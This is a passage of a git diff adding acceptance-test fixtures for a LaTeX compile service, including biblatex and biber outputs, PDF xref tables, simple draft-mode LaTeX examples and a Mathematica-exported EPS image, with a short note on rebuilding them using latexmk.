@@ +% $ biblatex auxiliary file $ +% $ biblatex version 1.5 $ +% $ biber version 0.9.3 
$
+% Do not modify the above lines!
+%
+% This is an auxiliary file used by the 'biblatex' package.
+% This file may safely be deleted. It will be recreated by
+% biber or bibtex as required.
+%
+\begingroup
+\makeatletter
+\@ifundefined{ver@biblatex.sty}
+  {\@latex@error
+     {Missing 'biblatex' package}
+     {The bibliography requires the 'biblatex' package.}
+      \aftergroup\endinput}
+  {}
+\endgroup
+
+
+\refsection{0}
+  \entry{DouglasAdams}{book}{}
+    \name{labelname}{1}{}{%
+      {{}{Adams}{A\bibinitperiod}{Douglas}{D\bibinitperiod}{}{}{}{}}%
+    }
+    \name{author}{1}{}{%
+      {{}{Adams}{A\bibinitperiod}{Douglas}{D\bibinitperiod}{}{}{}{}}%
+    }
+    \list{publisher}{1}{%
+      {San Val}%
+    }
+    \strng{namehash}{AD1}
+    \strng{fullhash}{AD1}
+    \field{sortinit}{A}
+    \field{isbn}{9781417642595}
+    \field{title}{The Hitchhiker's Guide to the Galaxy}
+    \field{year}{1995}
+    \verb{url}
+    \verb http://books.google.com/books?id=W-xMPgAACAAJ
+    \endverb
+  \endentry
+
+  \lossort
+  \endlossort
+
+\endrefsection
+\endinput
+
diff --git a/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/output.pdf b/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/output.pdf
new file mode 100644
index 0000000..a2e037e
Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/output.pdf differ
diff --git a/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/output.pdfxref
new file mode 100644
index 0000000..1f1ac2b
--- /dev/null
+++ b/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/output.pdfxref
@@ -0,0 +1,31 @@
+1/0: uncompressed; offset = 59313
+2/0: uncompressed; offset = 59561
+3/0: uncompressed; offset = 15
+4/0: uncompressed; offset = 216
+5/0: uncompressed; offset = 734
+6/0: uncompressed; offset = 784
+7/0: uncompressed; offset = 913
+8/0: uncompressed; offset = 1028
+9/0: uncompressed; offset = 1528
+10/0: uncompressed; offset = 9787
+11/0: uncompressed; offset = 18282
+12/0: uncompressed; offset = 33607
+13/0: uncompressed; offset = 45579
+14/0: uncompressed; offset = 58005
+15/0: compressed; stream = 14, index = 0
+16/0: compressed; stream = 14, index = 1
+17/0: compressed; stream = 14, index = 2
+18/0: compressed; stream = 14, index = 3
+19/0: compressed; stream = 14, index = 4
+20/0: compressed; stream = 14, index = 5
+21/0: compressed; stream = 14, index = 6
+22/0: compressed; stream = 14, index = 7
+23/0: compressed; stream = 14, index = 8
+24/0: compressed; stream = 14, index = 9
+25/0: compressed; stream = 14, index = 10
+26/0: compressed; stream = 14, index = 11
+27/0: compressed; stream = 14, index = 12
+28/0: compressed; stream = 14, index = 13
+29/0: compressed; stream = 14, index = 14
+30/0: compressed; stream = 14, index = 15
+31/0: compressed; stream = 14, index = 16
diff --git a/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/output.run.xml b/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/output.run.xml
new file mode 100644
index 0000000..4d8dc94
--- /dev/null
+++ b/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/output.run.xml
@@ -0,0 +1,84 @@
+<?xml version="1.0" standalone="yes"?>
+<!-- logreq request file -->
+<!-- logreq version 1.0 / dtd version 1.0 -->
+<!-- Do not edit this file! -->
+<!DOCTYPE requests [
+  <!ELEMENT requests (internal | external)*>
+  <!ELEMENT internal (generic, (provides | requires)*)>
+  <!ELEMENT external (generic, cmdline?, input?, output?, (provides | requires)*)>
+  <!ELEMENT cmdline (binary, (option | infile | outfile)*)>
+  <!ELEMENT input (file)+>
+  <!ELEMENT output (file)+>
+  <!ELEMENT provides (file)+>
+  <!ELEMENT requires (file)+>
+  <!ELEMENT generic (#PCDATA)>
+  <!ELEMENT binary (#PCDATA)>
+  <!ELEMENT option (#PCDATA)>
+  <!ELEMENT infile (#PCDATA)>
+  <!ELEMENT outfile (#PCDATA)>
+  <!ELEMENT file (#PCDATA)>
+  <!ATTLIST requests
+    version CDATA #REQUIRED
+  >
+  <!ATTLIST internal
+    package CDATA #REQUIRED
+    priority (9) #REQUIRED
+    active (0 | 1) #REQUIRED
+  >
+  <!ATTLIST external
+    package CDATA #REQUIRED
+    priority (1 | 2 | 3 | 4 | 5 | 6 | 7 | 8) #REQUIRED
+    active (0 | 1) #REQUIRED
+  >
+  <!ATTLIST provides
+    type (static | dynamic | editable) #REQUIRED
+  >
+  <!ATTLIST requires
+    type (static | dynamic | editable) #REQUIRED
+  >
+  <!ATTLIST file
+    type CDATA #IMPLIED
+  >
+]>
+<requests version="1.0">
+  <internal package="biblatex" priority="9" active="0">
+    <generic>latex</generic>
+    <provides type="dynamic">
+      <file>output.bcf</file>
+    </provides>
+    <requires type="dynamic">
+      <file>output.bbl</file>
+    </requires>
+    <requires type="static">
+      <file>blx-compat.def</file>
+      <file>biblatex.def</file>
+      <file>numeric.bbx</file>
+      <file>standard.bbx</file>
+      <file>numeric.cbx</file>
+      <file>biblatex.cfg</file>
+      <file>english.lbx</file>
+    </requires>
+  </internal>
+  <external package="biblatex" priority="5" active="1">
+    <generic>biber</generic>
+    <cmdline>
+      <binary>biber</binary>
+      <infile>output</infile>
+    </cmdline>
+    <input>
+      <file>output.bcf</file>
+    </input>
+    <output>
+      <file>output.bbl</file>
+    </output>
+    <provides type="dynamic">
+      <file>output.bbl</file>
+    </provides>
+    <requires type="dynamic">
+      <file>output.bcf</file>
+    </requires>
+    <requires type="editable">
+      <file>bibliography.bib</file>
+    </requires>
+  </external>
+</requests>
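Note on the fixture layout above: every expected artifact is checked in as output.* (output.pdf, output.bbl, output.run.xml, output.pdfxref) because the compile service runs each project under a fixed job name of "output", as the <infile>output</infile> entry in output.run.xml reflects. A minimal sketch that approximates the biber_bibliography compile locally, assuming a TeX Live installation with latexmk and biber on the PATH (this is not the exact sandboxed invocation the service uses):

# Sketch only: rebuild the biber_bibliography artifacts by hand.
# Assumes TeX Live with pdflatex, latexmk and biber installed.
cd services/clsi/test/acceptance/fixtures/examples/biber_bibliography
# -jobname=output mirrors the service's fixed job name, which is why
# the expected files are named output.pdf, output.bbl, output.run.xml.
# latexmk detects the biblatex dependency via the generated .bcf file
# and runs biber automatically between pdflatex passes.
latexmk -pdf -jobname=output main.tex

The companion output.pdfxref files record the PDF cross-reference table, one entry per object giving the object number/generation plus either a byte offset (uncompressed) or the containing object stream and index (compressed), which the acceptance tests use as expected output; scripts/demo-pdfjs-Xref.js prints the same entries for an arbitrary PDF via parseXrefTable.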
diff --git a/services/clsi/test/acceptance/fixtures/examples/draft_legacy/frog.jpg b/services/clsi/test/acceptance/fixtures/examples/draft_legacy/frog.jpg new file mode 100644 index 0000000..5b889ef Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/draft_legacy/frog.jpg differ diff --git a/services/clsi/test/acceptance/fixtures/examples/draft_legacy/main.tex b/services/clsi/test/acceptance/fixtures/examples/draft_legacy/main.tex new file mode 100644 index 0000000..e3c77e1 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/draft_legacy/main.tex @@ -0,0 +1,25 @@ +\documentclass{article} + +\usepackage{graphics} + +\title{Your Paper} +\author{You} + +\begin{document} +\maketitle + +\begin{abstract} +Your abstract. +\end{abstract} + +\section{Introduction} + +This is the start of the document. + +\begin{figure}[ht] +\includegraphics[0,0][100,100]{frog.jpg} +\end{figure} + +This is the end of the document. + +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/draft_legacy/options.json b/services/clsi/test/acceptance/fixtures/examples/draft_legacy/options.json new file mode 100644 index 0000000..183ed4b --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/draft_legacy/options.json @@ -0,0 +1,3 @@ +{ + "draft": true +} \ No newline at end of file diff --git a/services/clsi/test/acceptance/fixtures/examples/draft_legacy/output.pdf b/services/clsi/test/acceptance/fixtures/examples/draft_legacy/output.pdf new file mode 100644 index 0000000..c85b128 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/draft_legacy/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/draft_legacy/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/draft_legacy/output.pdfxref new file mode 100644 index 0000000..eab8b42 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/draft_legacy/output.pdfxref @@ -0,0 +1,39 @@ +1/0: uncompressed; offset = 67338 +2/0: uncompressed; offset = 67606 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 790 +6/0: uncompressed; offset = 840 +7/0: uncompressed; offset = 975 +8/0: uncompressed; offset = 1083 +9/0: uncompressed; offset = 1578 +10/0: uncompressed; offset = 9881 +11/0: uncompressed; offset = 17868 +12/0: uncompressed; offset = 29906 +13/0: uncompressed; offset = 38400 +14/0: uncompressed; offset = 46656 +15/0: uncompressed; offset = 56198 +16/0: uncompressed; offset = 65682 +17/0: compressed; stream = 16, index = 0 +18/0: compressed; stream = 16, index = 1 +19/0: compressed; stream = 16, index = 2 +20/0: compressed; stream = 16, index = 3 +21/0: compressed; stream = 16, index = 4 +22/0: compressed; stream = 16, index = 5 +23/0: compressed; stream = 16, index = 6 +24/0: compressed; stream = 16, index = 7 +25/0: compressed; stream = 16, index = 8 +26/0: compressed; stream = 16, index = 9 +27/0: compressed; stream = 16, index = 10 +28/0: compressed; stream = 16, index = 11 +29/0: compressed; stream = 16, index = 12 +30/0: compressed; stream = 16, index = 13 +31/0: compressed; stream = 16, index = 14 +32/0: compressed; stream = 16, index = 15 +33/0: compressed; stream = 16, index = 16 +34/0: compressed; stream = 16, index = 17 +35/0: compressed; stream = 16, index = 18 +36/0: compressed; stream = 16, index = 19 +37/0: compressed; stream = 16, index = 20 +38/0: compressed; stream = 16, index = 21 +39/0: compressed; stream = 16, index = 22 diff --git 
a/services/clsi/test/acceptance/fixtures/examples/draft_mode/frog.jpg b/services/clsi/test/acceptance/fixtures/examples/draft_mode/frog.jpg new file mode 100644 index 0000000..5b889ef Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/draft_mode/frog.jpg differ diff --git a/services/clsi/test/acceptance/fixtures/examples/draft_mode/main.tex b/services/clsi/test/acceptance/fixtures/examples/draft_mode/main.tex new file mode 100644 index 0000000..643ed95 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/draft_mode/main.tex @@ -0,0 +1,37 @@ +\documentclass{article} +% Language setting +% Replace `english' with e.g. `spanish' to change the document language +\usepackage[english]{babel} + +% Set page size and margins +% Replace `letterpaper' with `a4paper' for UK/EU standard size +\usepackage[letterpaper,top=2cm,bottom=2cm,left=3cm,right=3cm,marginparwidth=1.75cm]{geometry} + +% Useful packages +\usepackage{amsmath} +\usepackage{graphicx} +\usepackage[colorlinks=true, allcolors=blue]{hyperref} + +\title{Your Paper} +\author{You} + +\begin{document} +\maketitle + +\begin{abstract} +Your abstract. +\end{abstract} + +\section{Introduction} + +This is the start of the document. + +\begin{figure}[h] + \centering + \includegraphics[width=0.3\textwidth]{frog.jpg} + \caption{\label{fig:frog}This frog was uploaded via the file-tree menu.} +\end{figure} + +This is the end of the document. + +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/draft_mode/options.json b/services/clsi/test/acceptance/fixtures/examples/draft_mode/options.json new file mode 100644 index 0000000..183ed4b --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/draft_mode/options.json @@ -0,0 +1,3 @@ +{ + "draft": true +} \ No newline at end of file diff --git a/services/clsi/test/acceptance/fixtures/examples/draft_mode/output.pdf b/services/clsi/test/acceptance/fixtures/examples/draft_mode/output.pdf new file mode 100644 index 0000000..182a9c3 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/draft_mode/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/draft_mode/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/draft_mode/output.pdfxref new file mode 100644 index 0000000..aa568c0 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/draft_mode/output.pdfxref @@ -0,0 +1,50 @@ +1/0: uncompressed; offset = 69708 +2/0: uncompressed; offset = 70038 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 867 +6/0: uncompressed; offset = 990 +7/0: uncompressed; offset = 1143 +8/0: uncompressed; offset = 1251 +9/0: uncompressed; offset = 1834 +10/0: uncompressed; offset = 10137 +11/0: uncompressed; offset = 18124 +12/0: uncompressed; offset = 31939 +13/0: uncompressed; offset = 40433 +14/0: uncompressed; offset = 48689 +15/0: uncompressed; offset = 58231 +16/0: uncompressed; offset = 67715 +17/0: compressed; stream = 16, index = 0 +18/0: compressed; stream = 16, index = 1 +19/0: compressed; stream = 16, index = 2 +20/0: compressed; stream = 16, index = 3 +21/0: compressed; stream = 16, index = 4 +22/0: compressed; stream = 16, index = 5 +23/0: compressed; stream = 16, index = 6 +24/0: compressed; stream = 16, index = 7 +25/0: compressed; stream = 16, index = 8 +26/0: compressed; stream = 16, index = 9 +27/0: compressed; stream = 16, index = 10 +28/0: compressed; stream = 16, index = 11 +29/0: compressed; stream = 16, index = 12 +30/0: 
compressed; stream = 16, index = 13 +31/0: compressed; stream = 16, index = 14 +32/0: compressed; stream = 16, index = 15 +33/0: compressed; stream = 16, index = 16 +34/0: compressed; stream = 16, index = 17 +35/0: compressed; stream = 16, index = 18 +36/0: compressed; stream = 16, index = 19 +37/0: compressed; stream = 16, index = 20 +38/0: compressed; stream = 16, index = 21 +39/0: compressed; stream = 16, index = 22 +40/0: compressed; stream = 16, index = 23 +41/0: compressed; stream = 16, index = 24 +42/0: compressed; stream = 16, index = 25 +43/0: compressed; stream = 16, index = 26 +44/0: compressed; stream = 16, index = 27 +45/0: compressed; stream = 16, index = 28 +46/0: compressed; stream = 16, index = 29 +47/0: compressed; stream = 16, index = 30 +48/0: compressed; stream = 16, index = 31 +49/0: compressed; stream = 16, index = 32 +50/0: compressed; stream = 16, index = 33 diff --git a/services/clsi/test/acceptance/fixtures/examples/epstopdf/image-eps-converted-to.pdf b/services/clsi/test/acceptance/fixtures/examples/epstopdf/image-eps-converted-to.pdf new file mode 100644 index 0000000..7b92690 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/epstopdf/image-eps-converted-to.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/epstopdf/image.eps b/services/clsi/test/acceptance/fixtures/examples/epstopdf/image.eps new file mode 100644 index 0000000..fb131b9 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/epstopdf/image.eps @@ -0,0 +1,6673 @@ +%!PS-Adobe-3.0 EPSF-1.2 +%%BoundingBox: 0 0 432 268 +%%HiResBoundingBox: 0 0 432 268 +%%Creator: (Wolfram Mathematica 8.0 for Linux x86 (64-bit) (February 23, 2011)) +%%CreationDate: (Monday, October 8, 2012)(15:03:46) +%%Title: Clipboard +%%DocumentNeededResources: font Times-Roman +%%DocumentSuppliedResources: font Times-Roman-MISO +%%+ font Mathematica2 +%%+ font Mathematica1 +%%DocumentNeededFonts: Times-Roman +%%DocumentSuppliedFonts: Times-Roman-MISO +%%+ Mathematica2 +%%+ Mathematica1 +%%DocumentFonts: Times-Roman +%%+ Times-Roman-MISO +%%+ Mathematica2 +%%+ Mathematica1 +%%EndComments +/p{gsave}bind def +/P{grestore}bind def +/g{setgray}bind def +/r{setrgbcolor}bind def +/k{setcmykcolor}bind def +/w{setlinewidth}bind def +/np{newpath}bind def +/m{moveto}bind def +/Mr{rmoveto}bind def +/Mx{currentpoint exch pop moveto}bind def +/My{currentpoint pop exch moveto}bind def +/X{0 rmoveto}bind def +/Y{0 exch rmoveto}bind def +/N{currentpoint 3 -1 roll show moveto}bind def +/L{lineto}bind def +/rL{rlineto}bind def +/C{curveto}bind def +/cp{closepath}bind def +/F{eofill}bind def +/f{fill}bind def +/s{stroke}bind def +/S{show}bind def +/tri{p 9 6 roll r 6 4 roll m 4 2 roll L L cp F P}bind def +/Msf{findfont exch scalefont[1 0 0 -1 0 0]makefont setfont}bind def +1 -1 scale 0 -267.698 translate +-35.28 -2.88 translate +[1 0 0 1 0 0 ] concat +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit + +%%MathematicaCell +%Cell[BoxData[ +% GraphicsBox[{{}, {}, +% {GrayLevel[0], LineBox[CompressedData[" +%1:eJw113dcTf8fB/B7697q7tW0KSoJWRnp/ba3rCR7kxmSzKy+KFlFvqSMjB++ +%ESqKrlVEKJoy2nvv3S/O+5x/7uPce8/n83m/nu+zeq7cOmeNBofDqeVyOH8+ +%2a0l/9EWydgK9V7d4EmZe47Cm8LwOycM2X1fGDzdYkfqz3L1024exbOfBoC3 +%r26ui2c5/R4EpUfSFFnDytWX/v2z/Q9yO+VvM84uo/8Hg9/5EpPBp8vUJbP/ +%fBMCXy8fN5GPKqPjn4DGhdnXo/JK1cKUG86jheEwxHn2wDHnSmm8Z7DcMeyV +%7+hStfni069rzZ7D73FreM8KSmj8KKiZGhB1z6dEHdRxdMqNl+C31zh+u20J +%zfcK1nC8d2oVFqsH/93egLor7NzkU0zzvwWPY/98uDG6WP2m1qxjhmhwtBjk 
+%dye/iNbzDkRHH6e5ny1Sz/k74XvY7J513WxUEa0vFhJ+vlgTkFOoztzzZ8AP +%YDckMqHAu5DWGwf9rDutaBhWqN72Z3nOn2DLwfSeGb8LaP2fobqXp8v54wVq +%RiMedJ1rPhpaFVA98XBvmqp6Y1q+evLfCRIgKtrukO+hfKovAa4/0ex0wDxf +%/We2xae/wuWhSVqYkEf1foM7E+x2fnPLU/8tJ+Ub9MHHQYN75FH9iZCe2ui9 +%4F2uuvuf5XRLghFBj47Yb8mlPJLAyiiZ11kvV71u7Z8tGcxC4sIeROZQPikQ +%nNGyS29ljvrPaLrBKXB/zgzOGJ0cyisVnGs38MYEZ6vr/gxXmwpxOW67tedl +%U35pMMcjofO/jVlq278DfoegKVuPNQVkUZ7f4RpHXT5wfJb67/I80mF2ZJu1 +%cWEm5fsDHKa6JZd5Z6o/xf3ZfoDBO+2sPYMyKe+fYGHW3z0pOUOt93eBv+DB +%/IdHm/ZkUP6/4Mi8AfcqumWo/w63+DfofvIPWuzxmzwy4HDdvBtr4n5RPRng +%XyQ/26D8RT4ZMPzRQcuhjj+pvgxocL11Ky/gB3llQtVuy7W2OelUbyYkKzUb +%upink18mhO8U4sXN36n+LKgLm1j3X0gaeWaB1zML89G1qZRHFmim+1ksHZ5K +%vtlgedzAUmNvCuWTDQ3HXh8c/iKZvLPBRX+wU01bEuWVA6+K352eiUnknwMT +%axKOmR9KpPxywHbtC6ejr75RP+RCoPeYCnfuN8ozF3oOWGKVjV+pP3LBe7L5 +%piz3BMo3Dxx73Vu6Niqe+iUPxjkazH/X8IXyzoM+e25rp+74TP2TD+LzNpol +%pXGUfz4kRp4W8dZ9pH7KhytWwuBOv2PJowD+O3xdbDv/PXkUQOigqX62cTHk +%UQAmpw6MmzEmmjwKID7AsmxD6BvyKAQn433ymWavyaMQ9Dj2C8ZeekkehfD2 +%tIXdFv0o8iiCLxaLbU3qItRn/noUgeSth6vXt3DyKAKT2d+7fgx+Qh7FUOYz +%5qzF8RDyKAazMPW0oKj75FEMtptcBlWtu0UeJTCxx4K8oZKr5FEChh625dcX +%+ZBHCdxdculc2bQ95FEK/jDse0aTGzAepXDat36zh6EPMB6lEOMyLXttSyAw +%HmXw0vl9VIrLLWA8yiDsQt/zKyvuA+NRBjv2/d43+GkIMB7lUHT/5ubmpifA +%eJTD2mtGW4vgKTAe5fB4Z5evQccigfGoAOVTaPVLiAKmngqY/6hX1yGyV8D4 +%VEBui2yWT9hrYOqrAGPprh6ey94C41UBT9Mc+z4XxABTbwVYR3y/ZB36Dhi/ +%Crh4w3aAYmUsMPVXgmNgbMYq+UdgPCvBzrn8foY6jvKohF1ulbIi58/A+FbC +%qfuxDgGKeMqnEmpM34d7FscD410J2DMwyigmgfKqgsnmb18fvPYVGP8qyP+i +%eXn3/m+UXxVk1g8+OnVhIjDnZxWU1nmvz7FOojyroIeBPsdSPxmY/qiCWTF9 +%JVibTPlWwzDfRG2DpBRg+qUaTjQei30Zmkp5V8O1LS5aQ/zSgOmfanAvvXnN +%fvd3yr8a7G59+7JjcTow/VQNMr7DyVn4gzxq4Oo/D/X5vX+SRw30CbVN8hT+ +%Io8aWFESNqam4hd51MCExLtuY1J/k0cN3LLSbRmxPIM8asBzeCet0MQM8qiB +%xasjHkZMySSPWoiyEMg7qTPJoxby2zPkrUOyyKMWLhklHVp0L4s8aiFlYNjQ +%vr2yyaMWTljpGO/5N5s8asG5x7V9qMghjzp4963x2KkTOeRRB5EuJi12Grnk +%UQeF/fc1B+3NJY+O/4+32L6lNpc86mCRzYR5UVvzyKMO9DZbrbtYlEce9WA1 +%w8COvzafPOoh3SfIODcznzzqwe12cr91SwvIox5SRvB2uKYXkEc98DhqF6lj +%IXnUw9beZyJtUgrJowFsrQ6d0ZpfRB4NYHrH/+TapCLyaIAuOL1mtn0xeTTA +%GuPw70VJxeTRABNkzUUqhxLyaACvueemlaeWkEcDOFnuMly9qJQ8GsFlgFfM +%gV+l5NEI+U+NetquLCOPRngeGBIYmFdGHo2wcvfdxR82lpNHI5zRh4MnK8vJ +%oxG4C3e46NhUkEcTNMd1Tw5wryCPJpi5wunA1TcV5NEEPv2vtpRoVwJzvWyC +%hNniq7emV5JHE+j1eBv69GwleTTBucifASNTKsmjGQ6uu2yt37WKPJph027d +%liWrqsijGZZWO1vp3K0ij2ZIWrG+uVtlFXk0w5uBsu6Bw6vJoxnEvr7uFw5W +%k0cLZAa39qx4X00eLdCw/9iod4oa8miBzg+mjuIvqiGPFni9sK/u26Aa8miB +%Al/97Y1lNeTRAv945ufdGFFLHi3Qpbvry89Ha8mjFbJ6eHq7xdeSRyu4t5vZ +%X+9SRx6t8HFCVbC9Ux15tMJJ19DlHmF15NEKBUP6rQJePXm0wrlbvnoec+rJ +%ow2GN6beXXKtnjzaIEQ7Qvmhop482mD5z+vvorGBPNrApmT4yTlnG8ijDfQq +%YhoOZjWQRxsIRxUOnz2kkTzaoelrk27YP43k0Q6orNB8m9ZIHu2w1HNA0X7L +%JvJoB0Mb7tisQ03k0Q4nnwiKeSlN5NEOrolmkc/6NZMHB0+MWM0dc6SZ6uFg +%7LMxG3Z/byYfDm6x7mLnOqiF6uOg79Tpd829WsiLgzNttkwMz2mBv+Wu5eC3 +%2QNna0Mr+XFw67ivTf0vtdL1gYPJni0OpnWt5MlBz/itIby5bZQHB1sbMyRR +%D9vIl4Mng7Y/Wydrp3w4+GOPlMvf2k7eHDwaGWJx6ks75cXF5DI/5+OGHGT8 +%ueh/JmX++ykcZPLj4nHJw1On9nKQ6QcujnPtZ5PxHweZPLmYMH6oV0QGB5n+ +%4OL7L1PajHW5yOTLRRvp2tM9J3OR6RcuvjN3mfxkHxeZvLnIyX8mKwzhItM/ +%XLR7Glv1NJ+LTP5c3Ou/b/LgbhrI9BMXh4UZzZ9nr4EMhwbKe4SeMfXWQMZD +%A9/FH4OwaA1kPDRwxL86ri1tGsh4aGBk9AfkjtBExkMDd7rFhH/boYlM/2ng +%4ATDJ1seaCLj0THvBndRdrEmMh4a2Du8LXiYOQ8ZDw18dd4yfPs6HjIeGmia +%1DnC7xYPGQ8NtN/c//GDPB4yHho4LPTEwxhTPjIeGhj4wmluhRMfGQ9NLJ7n +%mGv8H588NHHZ7mzu/ko+eWjij+WDrPjWWuShiUM9n54O3a9FHproO9Y5/0m0 +%FnloomCt/IGmTJs8NHG00ZFz9x21yUMTM0cbX4i9qU0empi9YeGrzdXa5KGJ +%Xvo9TS+P1SEPTaxVVV3c76NDHprYMNZ2uixPhzx4+NEnJXbXSAF58DBb97z7 
+%xzMC8uBh2zLR5oGFAvLg4QHhp+f3xgnJg4cRws6zVl8VkgcPraICnnu0C8mD +%h14jQjcPXyEiDx7GpEws8owWkQcPV1zemBzdT0wePFzjsF5Hx09MHjzUuXtS +%5ceTkAcPJzs6TQ/YKSEPHgZO/xLhXCQhDz4mdptgumiVlDz4uPCrVpRPhpQ8 +%+HjQZoT/uZUy8uBjr415hx8UysiDj6tc5vYeOUpOHny89DlzY8RROXnw8YP4 +%2ODrCXLy6Dh+bFe1XS8FefCx3n/ZZ4tdCvLg45ul2VYv4xXkwccGvW3hdwco +%yYOPe54UTHjkqyQPLbzbdNf7AkdFHlrIUWPfEBcVeXT0kUty5/FVKvLQQr7R +%zaMz9uqSR0dfRW7eoKfUIw8tdO/WLXFihB55aGGd1ZKK9W765KGF41+08r7P +%NSAPLTzbeGeVaIEheWihmb5sW85FI/LQwtHDQspjbDuThxbqTQ8JHBXclTy0 +%8NGVKzfH2fUkD208suB8pPknQ/LQxrkbyiR29/TIQxtTp7aeKF+rSx7aOOrC +%4WEXL6nIQxsrrU5OsNVSkYc2Opd6f15yTkke2rhlkNmQe4OV5NFxXpgZWaZm +%sx7a+CT3WZoikPXQxvCAL9Y/VrIe2vhc5jRvuaWCPDr2HbF5eaucPHQwNt7k +%dUGHN+Ohg8szu38bf1dOHjroOoNTnO0hJw8dNLh9xX/Wajl56ODH7Zn+AyfI +%yUMHHS8WbhlqJicPHayrWcPvLpEjc//UwWNdgnq45cvIQwc1LfudCQmXkYcO +%9p/le+K+p4w8dNBUEuTfbbmMPHTQwS6g5JO1jDx00LKqzOSEQkYeAlyvv2CP +%WSl7fgjwXtXzlkMf2PNDgJ2Gvm1w/p+UPAQIid39v5+QkocAz37gLb2+UUoe +%AnQ03/Xp3kwpeQhwEH93Yf4gKXkIULVkY9dRhlLyEODI1Z+X+LdJyEOAe0VR +%B6pyJeQhwJeuv+v6f5aQhwBX5R4QTA2XkIcQ+00ct2nwNQl5CHFSXO2vn14S +%8hCi/y/dk2N3SchDiI0ub9bbr5KQhxCD7zSaSmdJyEOIptmFtStGS8hDiP8z +%vvlmmoWEPIRosnSx6K2RhDyEuDVm966XOhLyEGL/5o2FoxvY65UQy276/BhW +%ICYPIVb0vOMXlComDyH+1+p95UismDxE+LzfgvNxEWLyEKEgPUCx976YPEQY +%O2uA8mSAmDxEGCbuv6X5jJg8RLguUKV8e0RMHiKcK3jUNcdVTB4i9JiQmDp/ +%g5g8Ova33QgwXComDxFW/HvZ1XyOmDxE+H2cfOGRiWLyEOHPuV0/m4wSk4cI +%Rw4yGS4cKCYPMb7rbJ08qLeYPMQoWBQ86XInMXmI0eHZiU0oF5OHGL3HDbja +%U0tMHmI06GPUbNMiIg8xrkz1MThdJSIPMYYeLQs1KBSRhxiN6nPOJv5m7x9i +%PHTWI/p1sog8xHhsAudK1icReYjx48pae6uO+w3jIcbS10cy7j8XkYcY7beN +%z5j/REQeErzdq+Rh3/si8pDgogMWm0yDROQhQcPN9tEz/EXkIcFrpVMXXfYV +%kYcE3Ve7L5Z6i8hDgvsWHku//cfhr4cET9WPX7n6gIg8JPhTc/GC8btE5CFB +%jwdPJkzscGQ8JDgqLkTo5CQiDwka3NnW9f5KEXlIMLXx8TtpRx8wHlI0Gfrg +%/ml7EXlIMfRmulV/OxF5SHH1ovT9RZNF5CHFSdue178eKyIPKb5clnwkzIb1 +%6LhObBxhGT2M9ZCiw+ry96UDWQ8pfnXPnzDQgvWQ4qgVQi/P3qyHFH3vnX/R +%2p31kOJQ3dTo451YDykG8swCzfVYDynumvhQniVjPWR4e2LdqYdC1kOGd/wm +%p/ryWQ8Z1h+OifHmsB4yDGyy5V5uFpKHDAsXqVIj64TkIcOf+d2tKyuF5CHD +%AylXDEeUCslDhpv2nfjtWyAkDxmeOjjzCDdHSB4yPGuVevvgbyF5yHDv1AVN +%inQhecjwtYk793GykDzk2NX8Ysuar0KqR46iVP5Q889C8pFj3kuDSS2xQqpP +%joYDWuf/ihaSlxxf+PUoi38lpHrleOOkdvjXF0Lyk6Pa521i1jMh1S/Hx+1G +%CZww9vlMjm2Lp6RZPmLzkGNBj/bY9cFCZN5nOu476/YWP7zL5iNHq7DgG1q3 +%2ec3OVaevW3qdIPNS47lccqA1EAhPT/IMZ0/ycTen81PjsZDV+/4eVFI/SDH +%6c5vmredZ/OU48iN7p7Kc0LqDzl6XXU2Up9i85Xjhv5Nuq5eQuoXOQb5BPUb +%cZzNW47TJA8rtDyE1D9yjPfwP/T7EJu/HOf17rv69QEh9ZMcz7Xoj324l/VQ +%YJ5Gb7M7bqyHAuHBsCF3d7IeCkx4fu126HbWQ4G2ZxsHfdzKeijQftr1psJN +%rIcCM8y/LFFuYD0UaB0SrTt+HeuhwHqfrF0HVrMeCtTvMz3z1QrWQ4FCboNS +%uox9flZgnx4tUSsXsx4KfHuv2kvtyHoocMWXDVEmDqyHAo2CTZeem8d6KNBj +%qnO99hzWQ4EH7B9P9LBjPRToGHFHXziD9VBgb4d9tRemsh4KvHz1XTeLyayH +%Ant8CV8XM4H1UOCMkVYjncaxHgpcN6abg2oM69FR75Tvs97ash4KxM3JbXtt +%WA8Fpr25fWXkSNZDidf1lpa3W7MeSuzbuVfEx6GshxI3Ogi0AwazHko85/Xo +%k6sV66FE25/LdtoPYD2U6PZsQdJIS9ZDiQOv6Bv0sWA9lCi4yNtoYM56KHFl +%U6yt1JT1UOJUt4hRot6shxI3KOSPJMashxLN93vl6PVkPZTY/L6+xLg766HE +%IapVUuuurEfHfHe+JNh1Zj2UOCWiJGyzEeuhxBXVRulnDFgPJf7PetaiZ3qs +%R8f+4bSwPBXroURV1to4QyXrocQj/V2WzJKzHkq8O2DNvpNS1kOJfcIUNz+J 